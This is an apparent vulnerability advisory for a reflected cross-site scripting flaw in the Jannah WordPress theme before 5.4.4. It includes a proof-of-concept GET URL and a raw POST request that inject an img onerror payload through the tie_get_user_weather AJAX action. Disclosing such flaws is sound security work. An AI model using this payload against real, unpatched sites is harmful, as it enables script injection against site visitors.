Themes Vulnerabilities
Jannah < 5.4.4 - Reflected Cross-Site Scripting (XSS)
Description
The theme did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
Proof of Concept
via GET: https://jannah.tielabs.com/demo/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5\"><img+src=x+onerror=alert(document.domain)>'%2C'custom_name'%3A'Cairo'%2C'animated'%3A'true'%7D via POST: POST /demo/wp-admin/admin-ajax.php HTTP/1.1 Host: jannah.tielabs.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 195 Connection: close action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5\"><img+src=x+onerror=alert(document.domain)>'%2C'custom_name'%3A'Cairo'%2C'animated'%3A'true'%7D
Affects Themes
Fixed in version 5.4.4
References
Classification
Miscellaneous
Original Researcher
Truoc Phan - Techlab Corporation
Submitter
Truoc Phan
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-06-07 (about 1 years ago)
Added
2021-06-07 (about 1 years ago)
Last Updated
2022-01-02 (about 11 months ago)